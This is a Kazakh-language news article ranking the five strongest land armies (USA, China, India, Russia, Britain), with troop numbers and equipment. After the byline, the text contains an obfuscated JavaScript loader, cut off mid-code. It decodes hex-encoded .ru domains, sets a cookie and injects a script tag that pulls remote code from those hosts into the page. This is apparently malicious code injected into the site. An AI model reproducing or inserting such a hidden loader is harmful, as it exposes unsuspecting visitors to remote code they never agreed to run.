Қазіргідей жаһанданған заманда қарулы күштері ең мықты елдер ғана басқаларға өз айтқанын істетіп, оларға өз үстемдігін жүргізе алады. Төрткүл әлем бойынша күш-қуаты ең мықты елдердің алғашқы бестігіне қай мемлекеттер кіреді десек, сарапшылар: «Бұл үшін әскери мамандар мен білікті ғалымдар жан-жақты зерттеулер жүргізіп, оларды бір-бірімен салыстырып, ақтық қорытындыны сонан кейін барып шығарғандықтан, олардың белгілі бір рейтинг бойынша орналасуы заңды», — деген пікірде. Сонымен, ең мықты қарулы күштері бар мемлекеттер шеруін мұхиттың арғы жағында жатқан алпауыт ел — АҚШ бастайды екен. Неге, енді соған қамшы тасталық.
АҚШ-тың құрлықтағы әскерінің құрамында 535 мың сарбаз бар, солардың ішінде шиеленіс ошақтарында өрбіген соғыстарға қатысып, онда мол тәжірибе жинақтаған сақа сарбаздар жетерлік. Олар су жаңа қару-жарақтармен жабдықталған, ал әскери дивизияларды сансыз көп әскери бригадалар қолдап отыратыны бұлжымас дәстүрге айналған. Әр дивизияның құрамына 3 бронетанкті бригада, механикаландырылған жаяу әскер, жеңіл қаруланған жаяу әскер, брондалған әскери «Stryker» көлігінің бригадасы, әуе-десанттық бригада мен әуе-шабуылдау бригадасы, сонымен қатар, бір авиация және артиллерия бригадасы кіретін көрінеді. Әр бөлімше құрамында 14-тен 18 мыңға дейін әскери қызметкер болатын көрінеді. Аталған қарулы әскер кезінде АҚШ президенттері Картер мен Рейган кезінде жасалып, өмір тәжірибесіне енгізілген «Үлкен бестік» (Big 5) атты қаруландыру жүйесін қолданатын болса керек. Бұл жүйенің құрамында «M1 Abrams» әскери танкі, «M2 Bradley» әскери көлігі, «AH-64 Apache» тікұшағы, реактивті ракеталарды ұшыратын «M270» қондырғысы мен зенит-ракетаға арналған «Patriot» қондырғылары 30 жылдан бері үздіксіз жұмыс істеп келе жатса керек. АҚШ-тың арнайы жасағына үш диверсиялық-барлаушылар батальоны, арнайы қаруланған жеті топ пен «Дельта» (Delta Force) арнайы жасағы кірсе, АҚШ әскерінің арнайы операцияларға бұйрық берушілерінің (Army Special Operations Command) саны 28 500-ге жетеді екен. Мамандар қару-жарақпен жабдықталу деңгейі мен қандай жасақ түрлерінің бар екендігіне қарай АҚШ-ты осылайша алғашқы бестіктің басына қойыпты.
Екінші орында Қытай қарулы күштері тұр. Бұл елдің әскері сары құрлықтағы ең күшті әскер ретінде бағаланады. Қытай әскерінің құрамында 1,6 миллион әскери қызметкер бар болса, әскердің басты міндеті — Қытай шекарасын сырттан төнетін қауіп-қатерден сақтап, ел іргесінің бекемдігін қамтамасыз ету. Бұл елдің әскери қару-жарақтары мен әскери техникалары АҚШ-тікіндей қуатты болмағанымен, саны мен сапасы жөнінен көш соңында қалмайтын қуатқа ие. Қытай әскері ескі қару-жарақтардан әлі күнге бас тартпаған. Мәселен, сондай ескі әскери қару қатарында «Тип 59» танкісі әлі қызмет ететін көрінеді. Ал «Тип 99» танкісі соңғы он жылда жаңа сипатқа ие болып, сапалық көрсеткіші жөнінен заманауи талаптарға жауап беретіндей қару-жараққа айналыпты. Жалпы, Қытай әскері өз танктерінің қуаттылығы мен сапалық көрсеткіштері жөнінен америкалық «M1 Abrams» танкісінен әлдеқайда күшті болуын көздейді. «WZ-10» тікұшағы — Қытай елінің алғашқы әскери тікұшағы. Қытай жасағының қару-жарақтары алдағы 2-3 онжылдық мұғдарында жаппай жаңаландырылып, мүлде басқаша сипатқа ие болуы мүмкін. Жасақ құрамына бронды танктер, механикалық және жаяу әскер бөлімшелері, сонымен қатар, 3 әуе-десанттық дивизия мен үш теңіз десанттық бригадасы кіреді. Ал Шэньян әскери округіндегі дивизиялар Солтүстік Корея мемлекетімен арадағы ел қауіпсіздігін және елдің ішкі жағдайын қорғайтын жедел әскери құрылым болып табылады.
Келесі сатыға Үндістан әскері жайғасқан. Ресми деректерге сенсек, Үнді әскерінің қатарында 1,12 миллион сарбаз қызмет етеді. Әскери қызметкерлерінің саны жөнінен бұл Азияда Қытайдан кейінгі екінші орында тұрған қарулы күш болып саналады. 1,2 миллиард халқы бар мемлекетке ел ішіндегі көтерілістерді басып, арнайы операциялар жүргізу үшін Үндістанға мінсіз қаруланған мол жаяу әскер қажет. Бірақ бұл мемлекеттің әскері қатарында ел шекарасын сырттан төнетін қауіп-қатерден қорғайтын құрлықтық жасақтар жоқ екен. Үндістанның ең мықты деп саналатын дивизиясы аса екпінді 4 корпусқа бөлінген, оның үшеуі Пәкстанмен шекаралас тұста, біреуі Қытаймен шекаралас жерде орналасқан. Үндістанның қарулы күшінің қатарында екі теңіз десанты бригадасы мен 340 жаяу әскер бригадасы, үш десант батальоны мен арнайы жасақталған сегіз бригада бар. Соңғы он жылда Үндістан әскерінің қарулары айтарлықтай жаңартылып, заманауи талаптарға сай өзгеріпті. Бұл елдің қарулы күшінің негізін «Arjun» танкісі, ресейлік «Т-90» танкісі, америкалық «AH-64 Apache» тікұшағы сынды әскери техникалар құрайды.
Төртінші орынға Ресей әскери күшін қойыпты. Бұл әскер Кеңес армиясының жобасында құрылған. 1991 жылы Кеңес одағы ыдырағаннан кейін көптеген бөлімшелер Ресей әскерінің қатарына қосылған. Ресейдің құрлықтағы қарулы күші жаңа әрі заманауи қарулармен жабдықтанған. Оның әскерінің саны 285 мың адамды құрайды, яғни бұл америкалық әскердің жартысына тең. Ресей әскері толық механикалық жүйемен жабдықталған. Жасақ саны аз болғанымен, Ресейдің қарулы күші Ұлы Отан соғысынан кейін айтарлықтай соғыс тәжірибелерін игерген. Тәжірибемен қоса, әуе-десанттық бөлімдер мен теңіз әскерінің де белгілерін алған. Дивизия құрамында 6 мың әскери қызметкер бар. Саны аз болғанымен, ол аса қабілетті әрі десанттық әскери көліктермен жабдықталған. 9 мың теңіз әскері әскери-теңіз күшін құрайды. Ресейдің құрлықтағы әскері біраз жылдан кейін универсалды әскери аса екпінді «Армата» атты жаңа танктермен жабдықталады. Бұл әскери қарулы көліктер «Т-72», «Т-80», «Т-90» танктерінің, бронды транспорттардың толық қасиетін иемденбекші.
Бестікті Британ әскері түйіндейді. Британ әскері саны аз болғанмен, Еуропада айтарлықтай орны бар күш. Жеңіл жаяу әскер, десантты жасақ, брондалған танктер, механикалық және авиациялық бөлімшелер бір-бірімен үйлесім тауып, түрлі операцияларды орындауға жұмылдырылған. Британ әскерінің құрамында бүгінгі күні 120 мың сарбаз бар. 2020 жылы құрлықтағы Британ қарулы күші қайта жаңарып, қызметкерлер саны 82 мыңға қысқарып, есесіне, міндетті әскери қызметтен босатылып, резервке шығарылған әскери қызметкердің рөлі артпақ. Сол жылы британ армиясы жеті бригададан тұрмақшы. Жоспар бойынша, оның бірі — әуе десанты, үшеуі — брондалған механикалық бригада, тағы үшеуі жаяу әскер бригадасы болмақ. Британ әскері де жаңа жүйе бойынша қаруланған. «Challenger II» негізгі танкі мен жаяу әскердің «Warrior» көлігі механикалық бөлімдерде қолданылып жүр. Ерекше жағдайдағы және арнайы операцияларды орындауға арналған британ армиясының құрамы да аса үлкен емес, бірақ олар әлемнің ең мықтыларының қатарында. Қарулы күш 16 әуе-десанттық бригадасы бар үш десантты батальоннан тұрады. Онда атақты 22-арнайы әуе қызметінің (SAS) полкі бар. Сондай-ақ, патшаның құрлықтағы әскери күшті негізге алған 8 мың теңіз десанты әскери-теңіз күші басқармасына қарайды.
БАҚ деректері бойынша
әзірлеген — Ермек Сахариев
«Қазақстан-ZAMAN» [removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6171657632366a382e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25169",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alashainasy.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i